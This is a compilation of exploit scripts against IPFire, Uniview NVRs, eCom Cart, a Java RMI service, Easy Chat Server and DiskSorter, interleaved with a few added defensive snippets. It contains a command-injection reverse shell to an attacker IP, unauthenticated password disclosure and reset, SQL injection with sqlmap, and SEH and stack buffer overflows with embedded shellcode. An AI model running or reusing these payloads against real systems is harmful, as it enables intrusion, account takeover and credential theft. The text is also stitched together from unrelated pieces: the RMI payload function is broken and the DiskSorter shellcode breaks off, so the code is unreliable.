# The file ids.cgi does not sanitize the OINKCODE parameter, which is passed to a system call that invokes wget.
# You need valid credentials to exploit this vulnerability or you can exploit it through CSRF.
# 
#

import requests


# Adjust the ip and ports. 

revhost = '192.168.56.1'
revport = 1337
url = 'https://192.168.56.102:444/cgi-bin/ids.cgi'
username = 'admin'
password = 'admin'


payload = 'bash -i >& /dev/tcp/' + revhost + '/' + str(revport) + ' 0>&1'
evildata = {'ENABLE_SNORT_GREEN':'on','ENABLE_SNORT':'on','RULES':'registered','OINKCODE': '`id`','ACTION': 'Download new ruleset','ACTION2':'snort'}
headers = {'Accept-Encoding' : 'gzip, deflate, br','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','User-Agent':'IPFIRE Exploit','Referer': url,'Upgrade-Insecure-Requests':'1'}


def verifyVuln():
	req = requests.post(url,data=evildata,headers=headers,auth=(username,password),verify=False) # Verify false is added because most of the time the certificate is self signed.
	if(req.status_code == 200 and "uid=99(nobody)" in req.text):
		print "[+] IPFire Installation is Vulnerable [+]"
		revShell()
	else:
		print "[+] Not Vulnerable [+]"

def revShell():
	evildata["OINKCODE"] = '`' + payload + '`'
	print "[+] Sending Malicious Payload [+]"
	req = requests.post(url,data=evildata,headers=headers,auth=(username,password),verify=False)

	
verifyVuln()
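Defender's counterpart to the ids.cgi issue described in the header above, added here as an example that is not IPFire's code: an allow-list check for the OINKCODE value, a metacharacter scan for reviewing submitted values in logs or captures, and a wget invocation built as an argv list so no shell ever re-parses the parameter. The 40-hex-character oinkcode shape, the rules_url_template format string and the destination path are assumptions.

```python
import re
import subprocess

# Assumption for this example: an oinkcode is a 40-character hex token; any
# other shape is rejected before it can reach a command line.
OINKCODE_RE = re.compile(r"^[0-9a-fA-F]{40}$")

# Shell metacharacters that change the meaning of a command line built by
# string concatenation; used for log/request review, not as the validator.
SHELL_METACHARS = set("`$;|&<>()\n\\'\"")


def is_valid_oinkcode(value):
    """Allow-list check: only a bare hex token passes, so command substitution
    such as the PoC's backticks can never reach the download step."""
    return bool(OINKCODE_RE.match(value))


def suspicious_metachars(value):
    """Return the shell metacharacters present in a submitted OINKCODE value,
    for reviewing web-server logs or request captures for injection attempts."""
    return sorted(set(value) & SHELL_METACHARS)


def build_wget_argv(oinkcode, rules_url_template, dest="/tmp/ruleset.tar.gz"):
    """Compose the download command as an argv list. rules_url_template is a
    hypothetical format string with an {oinkcode} placeholder (assumption)."""
    if not is_valid_oinkcode(oinkcode):
        raise ValueError("rejected oinkcode: not a 40-character hex token")
    url = rules_url_template.format(oinkcode=oinkcode)
    return ["wget", "-q", "-O", dest, url]


def download_ruleset(oinkcode, rules_url_template, runner=subprocess.run):
    """Validate, then run wget without a shell: with an argv list and
    shell=False (the default) the URL is one argument and is never re-parsed.
    runner is injectable so the command can be inspected without executing."""
    argv = build_wget_argv(oinkcode, rules_url_template)
    return runner(argv, check=False)


if __name__ == "__main__":
    # Constructed sample inputs: the PoC's probe value and a well-formed code.
    for sample in ("`id`", "0123456789abcdef0123456789abcdef01234567"):
        print(sample, "valid:", is_valid_oinkcode(sample),
              "metachars:", suspicious_metachars(sample))
```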
            
#Uniview NVR remote passwords disclosure
#Author: B1t

# The Uniview NVR web application does not enforce authorization on the main.cgi file when requesting JSON data.
# This means you can do anything without authentication, as long as you know the request structure.
# In addition, the users' passwords are both hashed and also stored in a reversible way.
# The PoC below remotely downloads the device's configuration file, extracts the credentials
# and decodes the reversible password strings using my crafted map.

# It is worth mentioning that when you log in, the JavaScript hashes the password with MD5 and passes it in the request.
# If the script retrieves only the hash and not the password, you can intercept the request and replace the generated
# MD5 with the one disclosed by this script.


# Tested on the following models:
#   NVR304-16E - Software Version B3118P26C00510
#   NVR301-08-P8 - Software Version B3218P26C00512
#                                   and version B3220P11
#
# Other versions may also be affected


#Usage: python nvr-pwd-disc.py http://Host_or_IP:PORT

# Run example:

# root@k4li:~# python nvr-pwd-disc.py http://192.168.1.5
#
# Uniview NVR remote passwords disclosure!
# Author: B1t
#
# [+] Getting model name and software version...
# Model: NVR301-08-P8
# Software Version: B3218P26C00512
#
# [+] Getting configuration file...
# [+] Number of users found: 4
#
# [+] Extracting users' hashes and decoding reversible strings:
#
# User    |    Hash                               |    Password
# _________________________________________________
# admin   |    3b9c687b1f4b9d87ed0fdd6abbf7e33d   |    <TRIMMED>
# default |                                       |    ||||||||||||||||||||
# HAUser  |    288b836a37578141fea6527b5e190120   |    123HAUser123[err
# test    |    51b2454c681f3205f63b8372096d990b   |    AA123pqrstuvwxyz
#
#  *Note that the users 'default' and 'HAUser' are default and sometimes inaccessible remotely





import requests
import xml.etree.ElementTree
import sys


print "\r\nUniview NVR remote passwords disclosure!"
print "Author: B1t\r\n"



def decode_pass(rev_pass):
    # Substitution map from the device's "reversible" encoding to plain characters
    pass_dict = {'77': '1', '78': '2', '79': '3', '72': '4', '73': '5', '74': '6', '75': '7', '68': '8', '69': '9',
                 '76': '0', '93': '!', '60': '@', '95': '#', '88': '$', '89': '%', '34': '^', '90': '&', '86': '*',
                 '84': '(', '85': ')', '81': '-', '35': '_', '65': '=', '87': '+', '83': '/', '32': '\\', '0': '|',
                 '80': ',', '70': ':', '71': ';', '7': '{', '1': '}', '82': '.', '67': '?', '64': '<', '66': '>',
                 '2': '~', '39': '[', '33': ']', '94': '"', '91': "'", '28': '`', '61': 'A', '62': 'B', '63': 'C',
                 '56': 'D', '57': 'E', '58': 'F', '59': 'G', '52': 'H', '53': 'I', '54': 'J', '55': 'K', '48': 'L',
                 '49': 'M', '50': 'N', '51': 'O', '44': 'P', '45': 'Q', '46': 'R', '47': 'S', '40': 'T', '41': 'U',
                 '42': 'V', '43': 'W', '36': 'X', '37': 'Y', '38': 'Z', '29': 'a', '30': 'b', '31': 'c', '24': 'd',
                 '25': 'e', '26': 'f', '27': 'g', '20': 'h', '21': 'i', '22': 'j', '23': 'k', '16': 'l', '17': 'm',
                 '18': 'n', '19': 'o', '12': 'p', '13': 'q', '14': 'r', '15': 's', '8': 't', '9': 'u', '10': 'v',
                 '11': 'w', '4': 'x', '5': 'y', '6': 'z'}
    rev_pass = rev_pass.split(";")
    # "124" entries are padding, not password characters
    pass_len = len(rev_pass) - rev_pass.count("124")
    password = ""
    for char in rev_pass:
        if char != "124": password = password + pass_dict[char]
    return pass_len, password

if len(sys.argv) < 2:
    print "Usage: " + sys.argv[0] + " http://HOST_or_IP:PORT\r\n PORT: The web interface's port"
    print "\r\nExample: " + sys.argv[0] + " http://192.168.1.1:8850"
    sys.exit()
elif "http://" not in sys.argv[1] and "https://" not in sys.argv[1]:
    print "Usage: " + sys.argv[0] + " http://HOST_or_IP:PORT\r\n PORT: The web interface's port"
    sys.exit()

host = sys.argv[1]

print "[+] Getting model name and software version..."
r = requests.get(host + '/cgi-bin/main-cgi?json={"cmd":%20116}')
if r.status_code != 200:
    print "Failed fetching version, got status code: " + str(r.status_code)

print "Model: " + r.text.split('szDevName":\t"')[1].split('",')[0]
print "Software Version: " + r.text.split('szSoftwareVersion":\t"')[1].split('",')[0]

print "\r\n[+] Getting configuration file..."
r = requests.get(host + "/cgi-bin/main-cgi?json={%22cmd%22:255,%22szUserName%22:%22%22,%22u32UserLoginHandle%22:8888888888}")
if r.status_code != 200:
    print "Failed fetching configuration file, response code: " + str(r.status_code)
    sys.exit()
root = xml.etree.ElementTree.fromstring(r.text)

print "[+] Number of users found: " + root.find("UserCfg").get("Num")
print "\r\n[+] Extracting users' hashes and decoding reversible strings:"
users = root.find("UserCfg").getchildren()

print "\r\nUser \t|\t Hash \t|\t Password"
print "_________________________________________________"
for user in users:
    l, p = decode_pass(user.get("RvsblePass"))
    print user.get("UserName"), "\t|\t", user.get("UserPass"), "\t|\t", p


print "\r\n *Note that the users 'default' and 'HAUser' are default and sometimes inaccessible remotely"
            
# Exploit Title: eCom Cart 1.3 Exploit
# Google Dork: inurl:"/pdetails/11" ([11] is variable)
# Date: 10.06.2017
# Exploit Author: Alperen Eymen Ozcan & Batuhan Camci
# Vendor Homepage: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007
# Software Link: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007
# Version: 1.3
# Tested on: Linux



$ curl http://localhost/ecom-cart/charge.php -d order_id=%271

Fatal error: Uncaught PDOException: SQLSTATE[42000]: Syntax error or access
violation: 1064 You have an error in your SQL syntax; check the manual
that corresponds to your MariaDB server version for the right syntax
to use near '1'' at line 1 in
/customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php:16
Stack trace:
#0 /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php(16):
PDO->query('SELECT * FROM 3...')
#1 {main}
  thrown in /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php
on line 16

$ sqlmap -u "http://www.lobisdev.one/ecom-cart/charge.php" --data="order_id=1" --dbs
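Added example (not eCom Cart's code) reproducing the failure behind the PDOException above in Python against an in-memory sqlite3 table: the concatenating query next to a parameterized one with input validation, each run on the advisory's `'1` probe. The orders table and its rows are constructed for the demonstration.

```python
import sqlite3


def make_orders_db():
    """Constructed in-memory stand-in for the shop's orders table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orders (order_id INTEGER PRIMARY KEY, total REAL)")
    conn.executemany("INSERT INTO orders VALUES (?, ?)", [(1, 9.99), (2, 19.50)])
    return conn


def fetch_order_vulnerable(conn, order_id):
    """The pattern behind the PDO error above: request input concatenated into
    the statement text, so a stray quote breaks the syntax (the error the
    advisory shows) and a crafted value changes what the query selects."""
    sql = "SELECT * FROM orders WHERE order_id = " + order_id
    return conn.execute(sql).fetchall()


def fetch_order_safe(conn, order_id):
    """Hardened form: check the expected shape first, then bind a parameter so
    the value is data to the database engine and never parsed as SQL."""
    if not order_id.isdigit():
        raise ValueError("order_id must be a decimal integer")
    sql = "SELECT * FROM orders WHERE order_id = ?"
    return conn.execute(sql, (int(order_id),)).fetchall()


def probe(fetch, order_id):
    """Run one variant on one input; report ('rows', n) or ('error', type)."""
    conn = make_orders_db()
    try:
        return ("rows", len(fetch(conn, order_id)))
    except (sqlite3.OperationalError, ValueError) as exc:
        return ("error", type(exc).__name__)
    finally:
        conn.close()


if __name__ == "__main__":
    # The advisory's probe value next to a normal one, through both variants.
    for value in ("1", "'1"):
        print(repr(value), "vulnerable:", probe(fetch_order_vulnerable, value),
              "safe:", probe(fetch_order_safe, value))
```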
            
#!/usr/bin/env python


import socket
import sys
import ssl


def getHeader():
	return '\x4a\x52\x4d\x49\x00\x02\x4b'

def payload():
	cmd = sys.argv[4]
	cmdlen = len(cmd)
	return data2

def raw(data):
	# getHeader()/payload() build the serialized stream as a text string of \xNN
	# escapes; latin-1 maps each code point back to the single byte it names, so
	# the send() calls below work whether the strings arrive as str or bytes.
	return data if isinstance(data, bytes) else data.encode("latin-1")

def sslMode():
	# The original called ssl.wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLSv1,
	# ciphers="ALL"); wrap_socket() has since been removed from Python, so an
	# unverified client context with every cipher enabled replaces it (current
	# OpenSSL builds may no longer offer TLSv1.0 at all).
	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
	context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
	context.check_hostname = False
	context.verify_mode = ssl.CERT_NONE
	context.set_ciphers("ALL")
	return context.wrap_socket(sock)

def exploitTarget(sock):
	server_address = (sys.argv[1], int(sys.argv[2]))
	print('connecting to %s port %s' % server_address)
	sock.connect(server_address)
	print('sending exploit headers\n')
	sock.sendall(raw(getHeader()))
	sock.recv(8192)
	print('sending exploit\n')
	sock.sendall(raw(payload()))
	sock.close()
	print('exploit completed.')

if __name__ == "__main__":
	if len(sys.argv) != 5:
		print('Usage: python ' + sys.argv[0] + ' host port ssl cmd')
		print('ie: python ' + sys.argv[0] + ' 192.168.1.100 1099 false "ping -c 4 yahoo.com"')
		sys.exit(0)
	use_ssl = sys.argv[3].lower()
	if use_ssl == "true":
		sock = sslMode()
	elif use_ssl == "false":
		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
	else:
		# The original fell through with sock = None and crashed inside connect()
		print('ssl must be "true" or "false", got: ' + sys.argv[3])
		sys.exit(1)
	exploitTarget(sock)

#!/usr/bin/env python3
# Exploit Title: Easy Chat Server Remote Password Reset
# Date: 09/10/2017
# Software Link: http://echatserver.com/ecssetup.exe
# Exploit Author: Aitezaz Mohsin
# Vulnerable Version: v2.0 to v3.1
# Vulnerability Type: Pre-Auth Remote Password Reset
# Severity: Critical

# ====================================================================================================
#	Registration page 'register.ghp' allows resetting ANY user's password.
# Remote unauthenticated attackers can send HTTP POST requests to hijack ANY Easy Chat Server account.
# ====================================================================================================

# USAGE: python exploit.py ip port username password

import sys
import socket

if len(sys.argv) != 5:
    print("USAGE: python " + sys.argv[0] + " ip port username password")
    sys.exit(1)

ip = sys.argv[1]
port = int(sys.argv[2])
username = sys.argv[3]
password = sys.argv[4]

# The registration form fields exactly as the original exploit sends them;
# RoomID and RepUserName carry the server's own template placeholders.
body = ("UserName=" + username + "&Password=" + password + "&Password1=ggg&Sex=0"
        "&Email=%25252540&Icon=image17.gif&Resume=aaa&cw=0"
        "&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change")

# Each header line must end in CRLF and a blank line must separate the headers
# from the body; the original concatenated them without any line endings.
request = "POST /registresult.htm HTTP/1.1\r\n"
request += "Host: " + ip + "\r\n"
request += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n"
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
request += "Accept-Language: en-US,en;q=0.5\r\n"
request += "Accept-Encoding: gzip, deflate\r\n"
request += "Connection: close\r\n"
request += "Content-Type: application/x-www-form-urlencoded\r\n"
request += "Content-Length: " + str(len(body)) + "\r\n"
request += "\r\n"
request += body

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
sock.sendall(request.encode("latin-1"))
response = sock.recv(4096)
sock.close()

# Report the server's status line instead of assuming success
print(response.decode("latin-1", "replace").split("\r\n")[0])
print("[#] Password change submitted for user '" + username + "'")

#!/usr/bin/env python3
# Exploit Title: Easy Chat Server Remote Password Disclosure
# Date: 09/10/2017
# Software Link: http://echatserver.com/ecssetup.exe
# Exploit Author: Aitezaz Mohsin
# Vulnerable Version: v2.0 to v3.1
# Vulnerability Type: Pre-Auth Remote Password Disclosure
# Severity: Critical

# =========================================================================================================
#	Registration page 'register.ghp' allows disclosing ANY user's password.
# Remote unauthenticated attackers can send HTTP GET requests to obtain ANY Easy Chat Server user password.
# =========================================================================================================

# USAGE: python exploit.py ip username

import re
import sys
import requests

if len(sys.argv) != 3:
    print("USAGE: python " + sys.argv[0] + " ip username")
    sys.exit(1)

ip = sys.argv[1]
username = sys.argv[2]

# register.ghp returns the edit form for the requested user with the password
# field pre-filled, and it does so without any authentication.
url = "http://" + ip + "/register.ghp?username=" + username + "&password="
response = requests.get(url, timeout=10)

pattern = r'<INPUT type="password" name="Password" maxlength="30"  value="(.+?)">'
matches = re.findall(pattern, response.text)

if not matches:
    print("[!] No password field in the response for '" + username + "' (HTTP " + str(response.status_code) + ")")
    sys.exit(1)

print("Password: " + matches[0])

#!/usr/bin/env python3
# Exploit Title: Easy Chat Server User Registration Buffer Overflow (SEH)
# Date: 09/10/2017
# Software Link: http://echatserver.com/ecssetup.exe
# Exploit Author: Aitezaz Mohsin
# Vulnerable Version: v2.0 to v3.1
# Vulnerability Type: Buffer Overflow
# Severity: Critical
# Tested on: [Windows XP Sp3 Eng]


# ======================================================================================================================
#	Username parameter in Registration page 'register.ghp' is prone to a stack-based buffer-overflow vulnerability.
# Application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer.
# ======================================================================================================================

# USAGE: python exploit.py ip

import sys
import socket

if len(sys.argv) != 2:
    print("USAGE: python " + sys.argv[0] + " ip")
    sys.exit(1)

ip = sys.argv[1]
socket = socket.socket(socket.AF_INET , socket.SOCK_STREAM)

socket.connect((ip , 80))

#AlphanumericShellcode

shellcode = ("\x89\xe2\xda\xde\xd9\x72\xf4\x59\x49\x49\x49\x49\x49\x43\x43"
"\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41"
"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x32\x55\x50\x33"
"\x30\x35\x50\x43\x50\x4d\x59\x5a\x45\x36\x51\x4f\x30\x32\x44"
"\x4c\x4b\x30\x50\x50\x30\x4c\x4b\x51\x42\x54\x4c\x4c\x4b\x30"
"\x52\x44\x54\x4c\x4b\x44\x32\x36\x48\x34\x4f\x58\x37\x50\x4a"
"\x31\x36\x36\x51\x4b\x4f\x4e\x4c\x47\x4c\x43\x51\x33\x4c\x43"
"\x32\x46\x4c\x51\x30\x39\x51\x48\x4f\x34\x4d\x45\x51\x48\x47"
"\x4d\x32\x4c\x32\x50\x52\x56\x37\x4c\x4b\x31\x42\x42\x30\x4c"
"\x4b\x31\x5a\x47\x4c\x4c\x4b\x30\x4c\x54\x51\x42\x58\x4a\x43"
"\x47\x38\x35\x51\x48\x51\x36\x31\x4c\x4b\x46\x39\x37\x50\x55"
"\x51\x49\x43\x4c\x4b\x50\x49\x35\x48\x4b\x53\x57\x4a\x37\x39"
"\x4c\x4b\x50\x34\x4c\x4b\x53\x31\x38\x56\x56\x51\x4b\x4f\x4e"
"\x4c\x49\x51\x38\x4f\x44\x4d\x53\x31\x39\x57\x37\x48\x4b\x50"
"\x32\x55\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d\x31"
"\x34\x43\x45\x5a\x44\x46\x38\x4c\x4b\x31\x48\x51\x34\x33\x31"
"\x58\x53\x42\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x46\x38\x35"
"\x4c\x35\x51\x4e\x33\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x4e\x30"
"\x4d\x59\x30\x44\x31\x34\x37\x54\x31\x4b\x51\x4b\x53\x51\x31"
"\x49\x50\x5a\x56\x31\x4b\x4f\x4d\x30\x51\x4f\x51\x4f\x50\x5a"
"\x4c\x4b\x35\x42\x5a\x4b\x4c\x4d\x51\x4d\x55\x38\x46\x53\x36"
"\x52\x35\x50\x55\x50\x45\x38\x32\x57\x32\x53\x30\x32\x51\x4f"
"\x56\x34\x33\x58\x30\x4c\x32\x57\x56\x46\x44\x47\x4b\x4f\x58"
"\x55\x4f\x48\x4c\x50\x35\x51\x43\x30\x43\x30\x37\x59\x4f\x34"
"\x50\x54\x50\x50\x32\x48\x37\x59\x4b\x30\x32\x4b\x55\x50\x4b"
"\x4f\x59\x45\x53\x5a\x33\x38\x50\x59\x50\x50\x5a\x42\x4b\x4d"
"\x51\x50\x36\x30\x31\x50\x36\x30\x45\x38\x4b\x5a\x54\x4f\x39"
"\x4f\x4b\x50\x4b\x4f\x38\x55\x4c\x57\x52\x48\x53\x32\x45\x50"
"\x44\x51\x31\x4c\x4b\x39\x4b\x56\x52\x4a\x52\x30\x50\x56\x56"
"\x37\x33\x58\x58\x42\x39\x4b\x46\x57\x55\x37\x4b\x4f\x39\x45"
"\x51\x47\x43\x58\x4f\x47\x4b\x59\x30\x38\x4b\x4f\x4b\x4f\x59"
"\x45\x51\x47\x42\x48\x54\x34\x5a\x4c\x57\x4b\x4b\x51\x4b\x4f"
"\x48\x55\x30\x57\x5a\x37\x42\x48\x32\x55\x52\x4e\x30\x4d\x45"
"\x31\x4b\x4f\x38\x55\x35\x38\x35\x33\x52\x4d\x45\x34\x45\x50"
"\x4b\x39\x4d\x33\x56\x37\x31\x47\x56\x37\x46\x51\x5a\x56\x32"
"\x4a\x44\x52\x56\x39\x31\x46\x5a\x42\x4b\x4d\x53\x56\x39\x57"
"\x30\x44\x51\x34\x57\x4c\x35\x51\x33\x31\x4c\x4d\x37\x34\x57"
"\x54\x32\x30\x58\x46\x35\x50\x51\x54\x50\x54\x30\x50\x31\x46"
"\x51\x46\x36\x36\x31\x56\x36\x36\x30\x4e\x36\x36\x51\x46\x31"
"\x43\x46\x36\x43\x58\x33\x49\x48\x4c\x47\x4f\x4b\x36\x4b\x4f"
"\x58\x55\x4c\x49\x4d\x30\x30\x4e\x36\x36\x47\x36\x4b\x4f\x56"
"\x50\x32\x48\x33\x38\x4c\x47\x35\x4d\x35\x30\x4b\x4f\x49\x45"
"\x4f\x4b\x4a\x50\x48\x35\x59\x32\x50\x56\x52\x48\x4f\x56\x5a"
"\x35\x4f\x4d\x4d\x4d\x4b\x4f\x58\x55\x37\x4c\x53\x36\x33\x4c"
"\x44\x4a\x4b\x30\x4b\x4b\x4d\x30\x33\x45\x45\x55\x4f\x4b\x37"
"\x37\x34\x53\x52\x52\x32\x4f\x53\x5a\x35\x50\x36\x33\x4b\x4f"
"\x4e\x35\x41\x41")     

# SEH overwrite: 217 bytes of padding reach the exception registration record.
# nSEH gets a short jump over the handler pointer (EB 06), SEH gets the handler
# address the original exploit uses (0x100104BC), and the shellcode follows.
magic = "B" * 217
magic += "\xeb\x06\x90\x90"  # nSEH: JMP SHORT +6, NOP, NOP
magic += "\xBC\x04\x01\x10"  # SEH: 0x100104BC
magic += shellcode
magic += "C" * 200

body = ("UserName=" + magic + "&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif"
        "&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register")

# Each header line ends in CRLF and a blank line separates headers from body;
# the original ended the header block right after the request line and ran the
# remaining headers together without line endings.
buffer = "POST /registresult.htm HTTP/1.1\r\n"
buffer += "Host: " + ip + "\r\n"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n"
buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer += "Accept-Language: en-US,en;q=0.5\r\n"
buffer += "Accept-Encoding: gzip, deflate\r\n"
buffer += "Referer: http://" + ip + "/register.ghp\r\n"
buffer += "Connection: close\r\n"
buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
buffer += "Content-Length: " + str(len(body)) + "\r\n"
buffer += "\r\n"
buffer += body

# latin-1 turns every \xNN escape in the payload back into a single raw byte
socket.sendall(buffer.encode("latin-1"))

try:
    data = socket.recv(4096)
    print(data.decode("latin-1", "replace"))
except OSError:
    # No answer is the expected outcome once the overflow takes the server down
    print("[*] Connection dropped: the server crashed or is running the payload")
socket.close()

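Added detection example, not part of the three exploits above and not Easy Chat Server code: it runs over constructed Common Log Format lines (the product's own log format is not shown on this page, so CLF is an assumption) and flags the pre-auth disclosure probe `GET /register.ghp?username=<user>&password=` followed by a `POST /registresult.htm` from the same client, which is the disclosure-then-reset sequence the two scripts above perform.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log in Common Log Format (not real Easy Chat Server
# output; the server's own log layout is not documented on this page).
SAMPLE_LOG = """\
10.0.0.5 - - [09/Oct/2017:10:00:01 +0000] "GET /register.ghp?username=alice&password= HTTP/1.1" 200 2310
10.0.0.5 - - [09/Oct/2017:10:00:07 +0000] "POST /registresult.htm HTTP/1.1" 200 512
10.0.0.9 - - [09/Oct/2017:10:02:13 +0000] "GET /register.ghp HTTP/1.1" 200 2290
10.0.0.9 - - [09/Oct/2017:10:02:40 +0000] "POST /registresult.htm HTTP/1.1" 200 512
10.0.0.7 - - [09/Oct/2017:10:03:00 +0000] "GET /register.ghp?username=bob&password= HTTP/1.1" 200 2310
10.0.0.7 - - [09/Oct/2017:10:03:01 +0000] "GET /register.ghp?username=carol&password= HTTP/1.1" 200 2310
"""

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_clf(line):
    """Return the CLF fields of one line as a dict, or None if it does not parse."""
    m = CLF_RE.match(line)
    return m.groupdict() if m else None


def is_disclosure_probe(entry):
    """GET /register.ghp?username=<x>&password= : the unauthenticated request
    that makes the server echo another user's password into the edit form."""
    if entry["method"] != "GET":
        return False
    parts = urlsplit(entry["target"])
    if parts.path.lower() != "/register.ghp":
        return False
    qs = parse_qs(parts.query, keep_blank_values=True)
    return "username" in qs and qs.get("password") == [""]


def is_reset_post(entry):
    """POST /registresult.htm, the handler the password-reset script submits to."""
    return entry["method"] == "POST" and urlsplit(entry["target"]).path.lower() == "/registresult.htm"


def analyze(log_text):
    """Return {ip: {"probed": [usernames], "reset_after_probe": bool}} for every
    client that issued at least one disclosure probe."""
    findings = defaultdict(lambda: {"probed": [], "reset_after_probe": False})
    for line in log_text.splitlines():
        e = parse_clf(line)
        if not e:
            continue
        if is_disclosure_probe(e):
            user = parse_qs(urlsplit(e["target"]).query, keep_blank_values=True)["username"][0]
            findings[e["ip"]]["probed"].append(user)
        elif is_reset_post(e) and e["ip"] in findings:
            # A reset POST from a client that already probed a password is the
            # account-takeover sequence, not an ordinary registration.
            findings[e["ip"]]["reset_after_probe"] = True
    return dict(findings)


if __name__ == "__main__":
    for ip, f in analyze(SAMPLE_LOG).items():
        print(ip, "probed:", f["probed"], "reset after probe:", f["reset_after_probe"])
```

Ordinary registrations (10.0.0.9, which opens register.ghp without a username parameter and then posts) are not reported; only clients that first requested another user's pre-filled form are, and the reset flag separates reconnaissance from a completed takeover.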
#!/usr/bin/python

###############################################################################
# Exploit Title: DiskSorter v9.7.14 - Local Buffer Overflow
# Date: 10-06-2017
# Exploit Author: abatchy17 -- @abatchy17
# Vulnerable Software: DiskSorter v9.7.14
# Vendor Homepage:    http://www.disksorter.com/    
# Version: 9.7.14
# Software Link:      http://www.disksorter.com/setups/disksorter_setup_v9.7.14.exe
# Tested On: Windows XP SP3
#
# To trigger the exploit, paste the content of exploit.txt into "Add Input Directory" text box
#
# Credit to n3ckD_ for discovering the DoS exploit
#
# Challenges to convert this DoS to code execution:
#   1. Program doesn't accept non-ASCII characters (0x01 to 0xff are okay-ish)
#   2. Buffer at ESP splits string if it contains a "\", this is bad since POP ESP is 0x5c
#   3. Had to write custom shellcode to get the exact location of alphanumeric shellcode in memory
#
#               +----------------------------------+
#               |1 custom shellcode == 1 dead llama|
#               +----------------------------------+
#
##############################################################################

a = open("exploit.txt", "w")

# Message=  0x651f214e : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False

badchars = "\x0a\x0d\x2f"

# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d\x2f"
buf =  ""
buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43"
buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b"
buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63"
buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37"
buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55"
buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f"
buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70"
buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c"
buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37"
buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51"
buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32"
buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61"
buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69"
buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d"
buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33"
buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76"
buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47"
buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50"
buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50"
buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f"
buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53"
buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50"
buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30"
